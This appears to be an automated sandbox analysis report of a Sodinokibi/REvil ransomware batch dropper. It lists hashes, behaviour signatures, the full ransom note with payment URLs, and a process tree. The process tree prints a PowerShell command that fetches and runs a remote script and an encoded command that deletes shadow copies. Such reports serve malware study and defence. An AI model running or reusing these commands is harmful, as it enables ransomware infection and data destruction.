Analysis

  • max time kernel
    140s
  • max time network
    138s
  • platform
    windows7_x64
  • resource
    win7v200430
  • submitted
    16-05-2020 02:10

General

  • Target

    ce9dc8d828e18ce089cc6d84d08fe452.bat

  • Size

    219B

  • MD5

    2d905313dbc56c967f83d1426a7df00c

  • SHA1

    44f27a3aa997e1cb05864f2bfd2ec0da5f1ea539

  • SHA256

    7442acba79bb7e085e7198a9bdc242d324676559fb316ab487018457b4e0260c

  • SHA512

    05e139eea56972f817f4583326ec6a448e3f93c74268ba6ea310f4dd879716340843ff33dc9b970895c02fb72ee0db7c28accb07eb64a1b847d3fdddfe14b32b

Malware Config

Extracted

  • Language
    ps1
  • Source
    URLs
  • ps1.dropper
    http://185.103.242.78/pastes/ce9dc8d828e18ce089cc6d84d08fe452

Extracted

Path

C:\l72kb975e-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension l72kb975e. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/B5220888DF7426CB 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/B5220888DF7426CB Warning: secondary website can be blocked, thats why first variant much better and more available. 
When you open our website, put the following data in the input form: Key: 5AmAgQpBI0tDppDP0bJTfXgnx7dstPw85BSRAYV8XlEFCUsJFPRmqpkzYMezmRC3 JBXRko0+GtsvrL0Lhq+3OShYAdH9VG51HViijFdxaFvcA1uFao5eDOj1oSNSygTj SeduJjpYGVxBI4ngXRw0WTVitjjWqRjIET7ceQSHe8Lh/lTUBaaBLTdCXs6uu6Nh WSGQ73I0DfleLsUfLCOiwOs34JckPvUXJgqWJMa6RO4Nce/rssf4nm+4h1pRZh6B 85bUAW3mZmSuVgputJn21omKuAhOSdlKlQsEhXUOw0nz7akyN8S2mGTrpQdKI7Dg aJ25PFcveQT/hb/DfiBQ0oNiQ6rQ57IMweoc+Dzhx4vzNdzGKtYU5w+jG+dM2QdJ rNoCXozZK0OJG6ffs8P1ft0JHs69jIl8wGCEbPfOTpumj3GFf7TABsQtQiNM1v0w N3E1vO09rLyi2QJDtaAT7/mKbZHeeqZX8Dy5Zasrqpp/XCcMxDAm1uhvaW7xdEb7 p0AaOWg3ERCTMQUoZbOk/qzf5onSzpVaWHabt4DR2KYVI4/T9z5R9sLxaP27ztmP wYEf34wZS+mqHbwyVVoIKJ1pmLXXhMtSR+SMVe43m05ugFNd/25KJEb7s2wEuPnH X4N6ZHmW0WBCXGSTppMqANSB9wbYskK7a4XG+9SnVHGNDWJHI/pg5mcn1agfFvum 8My7VM6kFiXmstJTaGZGAelFUy7PazvhslNCF0yBBSIHJbzdeVMmi2b+5LHs8d2R vJZ4hAtFDb93+CAo52n1u7jIyVXKxe+o5F4NrPnNtJ8UfY+2Ik9TPEfri4Mad04n SOTQjut+xe0jLH3cteEhPfmmrpBHKR6htoTbHNgAgM05GVrUD6/H7ineahiPxijX gRM5umolEdwPFLMy+h/eyHNQBccFSa5ISdAxHKJ44kpkfkbz5GnIfFZBqe5WSEFc J0WpmWaH7xtDizSiXV1EsnnQs/mnKQ+6nOYxaBEd4+WCCGV1l4IHc25QhZCdhD+q FbbQrW2ENPsRfU84uukG6zCf4p39iGmBjISbY5dH3eAn2tM6K+LvQT4R3SnzTROX NH9ChCElDq2qNsO82wL+ropqpy1dy1aSIDHNyHBXxC71Lb3EBiPRw0Xbt1vU/eUb 6JhXHS4oiOBcl3//X4zZlrBQIa4hPInt7eZtvhKgwATmjWQf2mTQGLBawmG44qbK IGmifHk0vMg9zMY34WMOQkJMH7pCW5Ozna36wZeAefJ2tTujcXIKTB5KmeT/J3th HGT/+GfHmYEDk9tOCz75fOBRdiSrltJfU/LcAI9nyIx/KEm13RE= ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/B5220888DF7426CB

http://decryptor.cc/B5220888DF7426CB

Signatures

  • Drops file in System32 directory 1 IoCs
  • Sodin, Sodinokibi, REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Enumerates connected drives 3 TTPs
  • Modifies service 2 TTPs 4 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Blacklisted process makes network request 168 IoCs
  • Modifies system certificate store 2 TTPs 10 IoCs
  • Drops file in Program Files directory 26 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\ce9dc8d828e18ce089cc6d84d08fe452.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1520
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/ce9dc8d828e18ce089cc6d84d08fe452');Invoke-PRBSJMAYEWZY;Start-Sleep -s 10000"
      2⤵
      • Drops file in System32 directory
      • Sets desktop wallpaper using registry
      • Suspicious use of WriteProcessMemory
      • Suspicious behavior: EnumeratesProcesses
      • Blacklisted process makes network request
      • Modifies system certificate store
      • Drops file in Program Files directory
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of AdjustPrivilegeToken
      PID:868
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1172
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Modifies service
    • Suspicious use of AdjustPrivilegeToken
    PID:784

Network

MITRE ATT&CK Enterprise v6

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2f8f6cc7-ae83-4f79-b06e-2b9a49e06c5b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3f934678-4276-4d7d-9a2b-7ccacecf398b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_670419ca-9b90-4e9d-a6c5-f73b7563d382

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9065e065-05e7-4eaa-bb93-1db6da178e99

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a3b7b651-7089-41b5-9155-3fb877609508

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b7a807a3-f6b6-4397-972a-e9e81988f869

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms